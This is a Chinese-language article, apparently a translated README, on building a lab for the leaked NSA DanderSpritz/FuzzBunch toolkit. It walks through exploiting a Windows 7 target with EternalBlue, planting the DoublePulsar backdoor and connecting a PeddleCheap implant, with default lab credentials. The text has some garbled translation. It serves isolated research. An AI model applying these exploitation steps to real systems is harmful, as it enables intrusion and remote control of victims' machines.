快捷搜索:  网络  后门  CVE  渗透  木马  扫描  黑客  as

方程式构造DanderSpritz工具测试环境研究

DanderSpritz是NSA泄露的一款有名的界面化遥控工具,由于其功能强盛因此一样成为了许多安全人员争相研究的对象。但在实际测试过程中,由于缺少说明文档,所以问题也层出不穷。而DanderSpritz lab就是为了解决这些问题而被开发出来的。DanderSpritz lab能够让安全研究人员轻松构建以及设置功能齐全的DanderSpritz实验环境,以进行相干的逆向及研究测试工作。

关于DanderSpritz lab的先容可以涉猎这篇文章:https://medium.com/@francisck/introducing-danderspritz-lab-461912313d7c

和我为DanderSpritz创建的文档网站:https://danderspritz.com

正告:本实验环境未执行任何情势的安全加固,并以默认的vagrant凭证运行。因此,请不要将该实验环境连接/桥接到任何重要的收集之中!

装置环境及软件版本请求:

20GB以上的可用磁盘空间

8GB以上的内存

20GB带宽使用(下载ISO,更新,服务包等)

Packer v1.2.3或更高版本

Vagrant v2.1.1或更高版本

Vagrant-Reload插件

Virtualbox(VMWare Fusion/Workstation)

启动DanderSpritz Lab

DanderSpritz使用Packer,Vagrant以及Vagrant-reload插件来装置以及设置实验环境。Packer将直接从Microsoft下载Windows ISO并装置该软件的试用版,以供后续的研究测试使用。

1.克隆DanderSpritz lab存储库到你的机器:git clone git@github.com:francisck/DanderSpritz_lab.git

2.确保你已装置Vagrant-reload插件 vagrant plugin install vagrant-reload

3.运行packer build danderspritz_lab.json命令,下载ISO并构建Vagrant box

4.Vagrant box构建实现后,启动捏造机:vagrant up

创建一个FuzzBunch项目

1.启动cmd并执行命令:D:\python fb.py

2.配置默认target地址192.168.40.3

3.配置默认callback地址192.168.40.4

4.不要使用重定向(起初)

5.保留默认日记目录

6.创建一个新项目(选项0)

7.为新项目命名

8.保留默认日记目录

1Fuzzbunch_project.png

目标行使

1.使用EternalBlue行使目标机器:use eternalblue

2.选择所有选项为默认,除传输机制外(delivery mechanism)。使用“FB”(传统部署)作为传输机制。

3.一旦eternalblue行使成功,设置danderspritz以及peddlecheap

设置并启动DanderSpritz

1.另外启动一个cmd并执行命令:D:\python configure_lp

2.允许Java通过防火墙

3.选择”Log directory” 旁的browse,并选择你创建的FuzzBunch项目名称

2DSZ_logs.png4.点击”go”

PeddleCheap预备(设置implant)

1.在DanderSpritz控制台中,执行命令:pc_prep

2.选择standard x64-winnt level 3 sharedlib payload 5

3.不要选择高级配置

4.选择执行立即归调(i妹妹ediate callback)

5.使用默认的PC ID (0)

6.选择”Yes”

7.不要更改侦听端口

8.保留默认的 “callback” 地址(127.0.0.1)

9.不要更改exe名称

10.使用默认key(选项2)

11.验证PeddleCheap设置是否有用

12.不要使用FC (felonycrowbar)进行设置

13.复制设置的二进制文件的地位:

3pc_config.png

通过DoublePulsar后门传输implant (peddlecheap)

1.在Fuzzbunch窗口中输入命令:use doublepulsar

2.当讯问你是否希翼变量配置提示时选择 “yes” 

3.选择所有变量配置为默认,除目标架构外(选项1)1) x64 x64 64-bits

4.选择“RunDLL”(选项2)2)RunDLL使用APC将DLL注入用户模式进程

4Doublepulsar_config.png5.当讯问你是否需要执行插件时,将所有其他选项保留为默认值并选择”Yes”

6.你应该能看到 “Doublepulsar succeeded”的提示

使用DanderSpritz连接PeddleCheap implant

1.在DanderSpritz界面的最上方选择“PeddleCheap”

2.从key下拉菜单当选择 “default” key

3.输入目标机器地址(192.168.40.3)

4.选择 “Connect to target”

5Peddlecheap_connect.png5.选择你的Fuzzbunch项目名称

6.守候DanderSpritz Survey实现(这里可能需要守候一段时间)

Vagrant基本使用命令

Bring up所有的DanderSprotz Lab主机:vagrant up

Bring up一个特定主机:vagrant up <hostname>

重启特定主机:vagrant reload <hostname>

重启特定主机并重新运行provision进程:vagrant reload <hostname> –provision

烧毁特定主机:vagrant destroy <hostname>

烧毁全部Danderspritz Lab环境:vagrant destroy

客户机快照:vagrant snapshot save <hostname> <snapshot_name>

恢复快照:vagrant snapshot restore <hostname> <snapshot_name>

主机状态检查:vagrant status

停息实验室环境:vagrant suspend

恢复实验室环境:vagrant resume

许可证过期

在许可证即将过期时,你可以通过在具有治理员权限的命令提示符中用rearm命令后重启电脑。根据微软官方文档中的声明,该命令至多可以重复使用三次,无线黑客,即至多可以再获得90天的windows使用许可。

`slmgr /rearm'

Lab信息

Lab图示

6DanderSpritz_lab.png

Lab相干信息

域名:windomain.local

治理员登录(所有机器):vagrant:vagrant

DC(域控制器):192.168.40.2/24

目标:192.168.40.3/24

DanderSpritz:192.168.40.4/24

Lab主机

DC – Windows 2008 R2域控制器

用于Windomain.local的Windows域控制器

WEF Server Configuration GPO

Enhanced Auditing GPO

PowerShell logging GPO

目标 – Windows 7 Workstation

摹拟目标 workstation / machine

加入Windomain.local Windows AD域

预装置了一些逆向/可视化工具

Chocolatey包治理工具,可用于进一步的工具装置

DanderSpritz Box – Windows 10

DanderSprirtz & Fuzzbunch 预装置

目标上装置的工具(Windows 7 SP1)

Sysmon

Sysinternal Tools (Procmon, TCPview, etc)

API Monitor

InfoPe

HxD

PEView

Windbg

WireShark

Binary Ninja

HashCalc

IDA 7 Free

Ollydbg

Enhanced Auditing GPO

PowerShell logging GPO

Windows事故转发到域控制器(WEC)

*参考来源:GitHub, secist 编译,

您可能还会对下面的文章感兴趣: